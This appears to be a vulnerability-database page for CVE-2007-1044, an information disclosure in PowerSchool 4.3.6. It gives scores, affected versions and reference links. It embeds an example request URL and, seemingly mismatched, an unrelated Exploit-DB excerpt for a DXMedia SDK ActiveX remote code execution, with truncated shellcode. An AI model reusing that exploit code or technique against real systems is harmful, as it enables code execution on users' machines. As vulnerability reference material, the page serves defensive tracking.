CVE-2007-1044
published 2007-02-21CVE-2007-1044: Pearson Education PowerSchool 4.3.6 allows remote attackers to list the contents of the admin folder via a URI composed of the admin/ directory name and an…
PriorityP430medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
8.54%
94.4th percentile
Pearson Education PowerSchool 4.3.6 allows remote attackers to list the contents of the admin folder via a URI composed of the admin/ directory name and an arbitrary filename ending in ".js." NOTE: it was later reported that this issue had been addressed by 5.1.2.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pearson_education | powerschool | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution
exploitdb·2007-08-10
CVE-2007-4336 Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution
Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution
---
Tested on:..
- Microsoft DirectX Media 6.0 SDK
- Microsoft Internet Explorer 6 + all patches
- Microsoft Windows XP SP2 Polish + all patches
Details:..
obj.SourceUrl = "AAAA..1044..AAAA";
location.reload();
[Module DXTLIPI]
EAX 41414141
CALL DWORD PTR DS:[EAX]
-->
var shellcode = unescape("%u9090%u9090"+ //Windows Execute Command (calc)
"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a
Exploit-DB
Powerschool 4.3.6/5.1.2 - JavaScript File Request Information Disclosure
exploitdb·2007-02-19
CVE-2007-1044 Powerschool 4.3.6/5.1.2 - JavaScript File Request Information Disclosure
Powerschool 4.3.6/5.1.2 - JavaScript File Request Information Disclosure
---
source: https://www.securityfocus.com/bid/22611/info
Powerschool is prone to an information-disclosure vulnerability because the application discloses information about administrative session variables.
An attacker can exploit these issue to obtain sensitive information that may aid in other attacks.
This issue affects Powerschool 4.3.6; other versions may also be affected.
UPDATE: Powerschool 5.1.2 is also reportedly affected by this issue, in a limited fashion.
http://www.example.com/admin/.js
No writeups or analysis indexed.
http://osvdb.org/33741http://securityreason.com/securityalert/2276http://www.securityfocus.com/archive/1/460533/100/0/threadedhttp://www.securityfocus.com/archive/1/484569/100/200/threadedhttp://www.securityfocus.com/bid/22611https://exchange.xforce.ibmcloud.com/vulnerabilities/32569http://osvdb.org/33741http://securityreason.com/securityalert/2276http://www.securityfocus.com/archive/1/460533/100/0/threadedhttp://www.securityfocus.com/archive/1/484569/100/200/threadedhttp://www.securityfocus.com/bid/22611https://exchange.xforce.ibmcloud.com/vulnerabilities/32569
2007-02-21
Published